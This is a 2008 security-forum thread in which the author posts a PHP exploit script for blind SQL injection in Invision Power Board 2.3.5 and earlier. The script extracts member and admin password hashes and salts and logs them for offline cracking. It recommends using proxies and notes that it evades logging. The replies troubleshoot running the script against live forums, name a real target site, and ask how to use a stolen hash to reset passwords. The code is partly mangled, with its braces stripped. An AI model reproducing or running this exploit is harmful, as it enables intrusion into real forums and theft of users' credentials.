IT Security and Insecurity Portal |
IPB <= 2.3.5 sql injection exploit (new version 1.2) |
Posted: Wed Sep 24, 2008 12:08 pm |
waraxe |
Site admin |

Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
Here it is as promised - new version. It's supporting multiple target ID-s, log format is compatible with passwordspro (easy to copy-paste).
Known problems: salts, containing colon (:), are problematic and needs to be handled manually. It's because passwordspro is using colon as separator between fields :)
Anyway - feedback is welcome ...
Code: |
// IPB <= 2.3.5 sql injection exploit
// Version 1.2
// written by Janek Vind "waraxe"
// Estonia, Tartu
// http://www.waraxe.us/
// 24. september 2008
// based on DarkFig's advisory
// http://acid-root.new.fr/?0:18
// 1. Fetching algorithm optimized for speed
// 2. Attack goes through $_POST, so no suspicious logs
// 3. Pretesting saves time if IPB is not vulnerable
// 4. curl extension autoloading
// 5. can work with multiple ID-s
// 6. log format compatible with passwordspro
// More useful tools: http://www.waraxe.us/tools/
// Waraxe forums: http://www.waraxe.us/forums.html
// NB! This exploit is meant to be run as php CLI!
// http://www.php.net/features.commandline
$url = 'http://localhost/ipb.2.3.5/';
$id_start = 1;// starting user ID, default value "1" is admin's ID
$id_end = 10;// ending user ID
$prefix = 'ibf_';// IPB table prefix, default is "ibf_"
# Proxy settings
# Be sure to use proxy :)
//$proxy_ip_port = '';
//$proxy_user_password = 'someuser:somepassword';
$outfile = './ipblog.txt';// Log file
// Don't mess below this line, unless you know the stuff ;)
die("Curl extension not loaded!\n Fatal exit ...\n");
echo "Curl loading success\n";
$cli = php_sapi_name() === 'cli';
// Warning, if executed from webserver
echo "<html><head><title>Attention!</title></head>\n";
echo "<body><br /><br /><center>\n";
echo "<h1>Warning!</h1>\n";
echo "This exploit is meant to be used as php CLI script!<br />\n";
echo "More information:<br />\n";
echo "<a href=\"http://www.google.com/search?hl=en&q=php+cli+windows\" target=\"_blank\">http://www.google.com/search?hl=en&q=php+cli+windows</a><br />\n";
echo "Still, you can try to run it from webserver.<br />\n";
echo "Just press the button below and prepare for long waiting<br />\n";
echo "And learn to use php CLI next time, please ...<br />\n";
echo "<form method=\"get\">\n";
echo "<input type=\"submit\" name=\"wtf-is-cli\" value=\"Let me in, i don't care\">\n";
echo "</form>\n";
echo "</center></body></html>\n";
// Let's try to maximize our chances without CLI
xecho("Target: $url\n");
xecho("Sql table prefix: $prefix\n");
xecho("Testing target URL ... \n");
xecho("Target URL seems to be valid\n");
add_line("Target: $url");
for($i = $id_start; $i <= $id_end; $i ++)
echo "Testing ID $i\n";
echo "ID $i not valid, passing ...\n";
echo "ID $i validated\n";
$hash = get_hash($i);
$salt = get_salt($i);
$line = "$i:$hash:$salt";
xecho("User ID: $i\n");
xecho("Hash: $hash\n");
xecho("Salt: $salt");
xecho("\nQuestions and feedback - http://www.waraxe.us/ \n");
die("See ya! :) \n");
function test_target_url()
global $url;
$post = 'act=xmlout&do=check-display-name&name=somethingfoobarkind%2527 OR 1=1-- ';
$buff = trim(make_post($url, $post, '', $url));
if($buff === 'notfound')
die('Target is patched? Exiting ...');
if($buff !== 'found')
die('Invalid response, target URL not valid? Exiting ...');
function test_target_id($id)
global $url, $prefix;
$post = 'UNION SELECT 1,1 FROM ' . $prefix . 'members_converge WHERE converge_id=' . $id . ' AND LENGTH(converge_pass_hash)=32';
return test_condition($post);
function get_salt($id)
$len = 5;
$out = '';
xecho("Finding salt ...\n");
for($i = 1; $i < $len + 1; $i ++)
$ch = get_saltchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current salt: $out \n");
xecho("\nFinal salt for ID $id: $out\n\n");
return $out;
function get_saltchar($pos, $id)
global $prefix;
$char = '';
$min = 32;
$max = 128;
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_salt,$pos,1))";
$curr = 0;
$area = $max - $min;
if($area < 2 )
$post = $pattern . "=$max";
$eq = test_condition($post);
$char = chr($max);
$char = chr($min);
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
$min = $curr;
$max = $curr;
xecho("Current test: $curr-$max-$min\n");
return $char;
function get_hash($id)
$len = 32;
$out = '';
xecho("Finding hash ...\n");
for($i = 1; $i < $len + 1; $i ++)
$ch = get_hashchar($i, $id);
xecho("Got pos $i --> $ch\n");
$out .= "$ch";
xecho("Current hash: $out \n");
xecho("\nFinal hash for ID $id: $out\n\n");
return $out;
function get_hashchar($pos, $id)
global $prefix;
$char = '';
$pattern = 'UNION SELECT 1,1 FROM ' . $prefix . "members_converge WHERE converge_id=$id AND ORD(SUBSTR(converge_pass_hash,$pos,1))";
// First let's determine, if it's number or letter
$post = $pattern . '%253e57';
$letter = test_condition($post);
$min = 97;
$max = 102;
xecho("Char to find is [a-f]\n");
$min = 48;
$max = 57;
xecho("Char to find is [0-9]\n");
$curr = 0;
$area = $max - $min;
if($area < 2 )
$post = $pattern . "=$max";
$eq = test_condition($post);
$char = chr($max);
$char = chr($min);
$half = intval(floor($area / 2));
$curr = $min + $half;
$post = $pattern . '%253e' . $curr;
$bigger = test_condition($post);
$min = $curr;
$max = $curr;
xecho("Current test: $curr-$max-$min\n");
return $char;
function test_condition($p)
global $url;
$bret = false;
$maxtry = 10;
$try = 1;
$pattern = 'act=xmlout&do=check-display-name&name=%%2527 OR 1=%%2522%%2527%%2522 %s OR 1=%%2522%%2527%%2522-- ';
$post = sprintf($pattern, $p);
$buff = trim(make_post($url, $post, '', $url));
if($buff === 'found')
$bret = true;
elseif($buff === 'notfound')
elseif(strpos($buff, '<title>IPS Driver Error</title>') !== false)
die("Sql error! Wrong prefix?\nExiting ... ");
xecho("test_condition() - try $try - invalid return value ...\n");
$try ++;
if($try > $maxtry)
die("Too many tries - exiting ...\n");
xecho("Trying again - try $try ...\n");
return $bret;
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)');
curl_setopt($ch, CURLOPT_PROXY, $GLOBALS['proxy_ip_port']);
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $GLOBALS['proxy_user_password']);
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
curl_setopt ($ch, CURLOPT_REFERER, $referer);
if($headers === TRUE)
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
curl_setopt ($ch, CURLOPT_HEADER, FALSE);
$fc = curl_exec($ch);
return $fc;
function add_line($line)
global $outfile;
$line .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $line);
function xecho($line)
echo "$line";
$line = nl2br(htmlspecialchars($line));
echo "$line";
Posted: Wed Sep 24, 2008 12:13 pm |
Detrol |
Beginner |

Joined: Sep 23, 2008 |
Posts: 4 |
Great job!  |
Posted: Wed Sep 24, 2008 2:51 pm |
martin1 |
Regular user |

Joined: Sep 21, 2008 |
Posts: 17 |
Nice one just what ive been waiting for !!  |
Posted: Thu Sep 25, 2008 11:58 am |
T0x1Cw4St3 |
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Joined: Aug 15, 2008 |
Posts: 17 |
Yay! ive been waiting for this.
Thanks a bunch, Waraxe
Still getting the error with every forum  |
Posted: Fri Sep 26, 2008 2:37 pm |
martin1 |
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Joined: Sep 21, 2008 |
Posts: 17 |
if your gettin the error with forums your testing they have probs patched it !! red in this section there is a part on how to tell if it hasnt been patched.  |
Posted: Sun Oct 05, 2008 3:45 pm |
BaH |
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Joined: Oct 05, 2008 |
Posts: 7 |
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PHP Warning: PHP Startup: curl: Unable to initialize module
Module compiled with module API=20001222, debug=0, thread-safety=1
PHP compiled with module API=20060613, debug=0, thread-safety=1
These options need to match
in Unknown on line 0
PHP Warning: dl(): curl: Unable to initialize module
Module compiled with module API=20001222, debug=0, thread-safety=1
PHP compiled with module API=20060613, debug=0, thread-safety=1
These options need to match
in C:\ipb.php on line 44
Curl extension not loaded!
Fatal exit ...
Anyone know how to fix this trouble?! Thank`s! |
Posted: Sun Oct 05, 2008 4:35 pm |
juicy |
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Joined: Oct 01, 2008 |
Posts: 10 |
I think you need a newer version of the CURL extenstion.
You can find infos here http://curl.haxx.se/libcurl/php/
Alternative way to crack your problem is to download new php package that includes curl (every since 4.0.2) and install it.
cheerz |
Posted: Sun Oct 05, 2008 6:34 pm |
BaH |
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Joined: Oct 05, 2008 |
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Location: stPeterburg |
Posted: Sun Oct 05, 2008 10:08 pm |
juicy |
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Joined: Oct 01, 2008 |
Posts: 10 |
open your php.ini file in the php directory and look in the extensions section
for a line like this
Quote: | extension=php_curl.dll |
probably it's commented with a leading ;
if this is the case, uncomment it and restart the webserver.
if you have no php_curl.dll entry in the extensions section of your php.ini file, add it and restart the server. |
Posted: Sun Oct 05, 2008 11:22 pm |
BaH |
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Joined: Oct 05, 2008 |
Posts: 7 |
Location: stPeterburg |
Thanks! Works! All as to a line extension=php_curl.dll in dynamic extension
section, I have acquired from the very beginning! The problem was in an
installation correctness php, to be exact its modules! Once again thanks you!
Posted: Sun Oct 05, 2008 11:46 pm |
juicy |
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Joined: Oct 01, 2008 |
Posts: 10 |
you're welcome  |
Posted: Mon Oct 06, 2008 1:55 pm |
cowcanfly |
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Joined: Oct 06, 2008 |
Posts: 1 |
I can't use exploit...
Target: xxxxxxx
Sql table prefix: ibf_
Testing target URL ...
Target is patched? Exiting ...
All time... For example http://forum.akado.ru
Help me plz  |
Posted: Mon Oct 06, 2008 9:54 pm |
SnIpEr |
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Joined: Sep 25, 2008 |
Posts: 37 |
Obviously it won't work. Try a different board. U can't win them all, sadly... |
Posted: Tue Oct 07, 2008 6:19 pm |
imzie |
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Joined: Oct 07, 2008 |
Posts: 15 |
tq for this..but i have 1 problem
i can take hash
Current hash: 96fc104312709828d6f46b5f0d56d4ef
Final hash: 96fc104312709828d6f46b5f0d56d4ef
but after i put at "index.php?act=Reg&CODE=lostpassform
hash no funcition ...
error : Sorry, the Validation Key is incorrect for this member. Please check the URL or the data you entered into the form. If the error persists, please contact a member of staff to assist you. If this validation isn't recent, it's possible your old account has been removed.
how to settel this prob.... sry bad eng  |
Posted: Mon Oct 13, 2008 3:33 am |
Javv |
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Joined: Oct 13, 2008 |
Posts: 1 |
hello friends and maybe make the injection, but want to open the file. php and edit it does, I get that can not be opened, and change the extension in php.ini, does not know if something wrong or that I run out of greetings |
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